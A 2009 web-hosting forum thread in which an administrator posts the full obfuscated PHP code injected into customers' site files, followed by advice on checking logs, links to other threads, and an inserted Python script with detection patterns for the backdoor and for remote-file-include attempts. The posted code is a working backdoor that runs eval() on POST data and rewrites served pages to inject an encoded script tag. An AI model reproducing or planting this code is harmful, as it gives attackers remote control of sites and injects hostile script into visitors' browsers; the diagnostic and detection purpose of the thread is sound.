The Community Forums


iframe/php exploit again

Discussion in 'General Discussion' started by gertiebeth, Mar 16, 2009.

  1. gertiebeth

    gertiebeth Well-Known Member

    Joined:
    Jun 4, 2003
    Messages:
    97
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Minnesota, USA
    cPanel Access Level:
    Root Administrator
    I currently run 22 Linux servers using cPanel with heavy mod_security rules and a firewall. PHP has been hardened and many other security measures are in place. Right now I have 3 different people that I host who are suffering from php include hacks. It is only 3 people and their sites are hosted on several different servers. No one else is having a problem, which leads me to believe this is a problem with the user's PC. But for the life of me I cannot find out how to help them! I have tried Google, but I'm not quite sure what to search for. Here is an example of the malicious code that is being inserted into their index.php, admin.php and other files:

    Code:
    <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdwR3YlM0NwR3Zzczd4Y3JpcEd2cHQlMjBod3pzcmMzZ0QlM0QlMkZod3olMkY3OCUyRVo3WjExMFo3WiUyRTE3T281R0Q4JTJFMjRIYjlPbyUyRmpPb3F1ZXJHRDh5JTJFSGJqc0dEOCUzRVo3WiUzQzNnRCUyRnNjWjdack9vaWh3enB0JTNFJykucmVwbGFjZSgvSGJ8T298b0t8cEd2fEdEOHwzZ0R8czd4fFo3Wnxod3ovZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
    Does anyone recognize this? All I've been able to find is problems back in 2008 with IX webhosting, which I have no affiliation with. All of my servers are managed by me from SoftLayer.

    Any help?
     
  2. LiNUxG0d

    LiNUxG0d Well-Known Member

    Joined:
    Jun 25, 2003
    Messages:
    206
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Gatineau, Quebec, Canada
    Typical source injections...

    The common things you can look at, on the server side, are these:

    - Locate references to .txt in a users domlogs (in the URI portion of accesses), to see if they logged in using a PHP include... there shouldn't be any if you run mod_sec heavily, but there might... :P

    - Check the /var/log/messages to see if the hackers have privs by password that the user may not be aware of.

    - Do the same, but for /usr/local/cpanel/logs/access_log (grep the users' username and sift through the IPs for oddballs)

    Are you locking down php.ini at all? (disable_functions)

    If the user has a cPanel with reseller privs, then you may need to reset their WHM password, as it may be compromised.

    Realistically, if it's 3 or so sites, I would think a keylogger on their home PC. If it's 3 or so SERVERS with 100+ accounts or something to that effect, I would think it may be rooted, depending on what's installed on it and how old your kernel is.

    There are - really - many many many guesstimatable factors in your equation... if there are no logs to prove intrusion, then I would suspect that the issue is more serious than you may think.

    Never take it lightly. I'm sure you don't. :)
     
    #2 LiNUxG0d, Mar 16, 2009
    Last edited: Mar 16, 2009
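A defender-side check covering both the file signature in gertiebeth's sample and the domlog test LiNUxG0d suggests, as an added Python example that is not from the thread; the sample file contents, log lines and indicator list are constructed here from the posted code, with the real base64 literal replaced by filler:

```python
import re

# Constructed sample, modelled on the prologue of the injected code in the thread
# (the real payload's base64 literal is replaced by filler).
INJECTED = (
    "<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)"
    "if(is_file($f='/tmp/m'.$i)){include_once($f);break;}"
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
    "if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('" + "QUFB" * 40 + "'));"
    "function tmp_lkojfghx($s){return $s;}"
    "function tmp_lkojfghx2(){ob_start('tmp_lkojfghx');}}"
    "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;"
    "tmp_lkojfghx2(); ?>\n<html><body>Hello</body></html>\n"
)
# Constructed clean file: a legitimate base64_decode call without the other markers.
CLEAN = "<?php\n$data = base64_decode($_GET['x']);\necho htmlspecialchars($data);\n"

# Each indicator is taken from a feature of the sample posted in the thread.
INDICATORS = [
    (r"function_exists\('tmp_lkojfghx'\)", "marker function name tmp_lkojfghx"),
    (r"eval\(\$_POST\[", "eval() of POST data: remote code execution backdoor"),
    (r"is_file\(\$f='/tmp/m'\.\$i\)", "include of dropper files /tmp/m1 .. /tmp/m9"),
    (r"set_error_handler\('tmp_lkojfghx2'\)", "error handler hooked to start output buffering"),
    (r"ob_start\('tmp_lkojfghx'\)", "output-buffer callback that rewrites served HTML"),
    (r"base64_decode\('[A-Za-z0-9+/=]{100,}'\)", "long inline base64 literal"),
]

def scan_php(source):
    """Return the labels of every indicator present in a PHP source string."""
    return [label for pattern, label in INDICATORS if re.search(pattern, source)]

# Apache combined-format line: client IP, request URI and status are what we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def rfi_attempts(lines):
    """Flag requests whose query string passes a remote URL ending in .txt (the
    domlog check from the thread); plain requests for .txt files are ignored."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and re.search(r'=(?:https?|ftp)://[^&\s]+\.txt', m.group('uri'), re.I):
            hits.append((m.group('ip'), m.group('uri'), m.group('status')))
    return hits

# Constructed domlog lines using RFC 5737 documentation addresses.
LOGS = [
    '203.0.113.9 - - [16/Mar/2009:10:01:02 -0500] "GET /index.php?page=http://203.0.113.77/cmd.txt? HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [16/Mar/2009:10:02:15 -0500] "GET /docs/readme.txt HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [16/Mar/2009:10:03:40 -0500] "POST /admin.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]
```

Run scan_php over each .php file under a user's document root and rfi_attempts over that user's domlog; a file hitting the marker-name or eval indicators should be treated as compromised and restored from a known-good copy rather than cleaned in place.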
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    There are several threads that discussed the iframe injection problem. Check out these threads:
    http://forums.cpanel.net/showthread.php?t=62821
    http://forums.cpanel.net/showthread.php?t=78595
    http://forums.cpanel.net/showthread.php?t=78084
     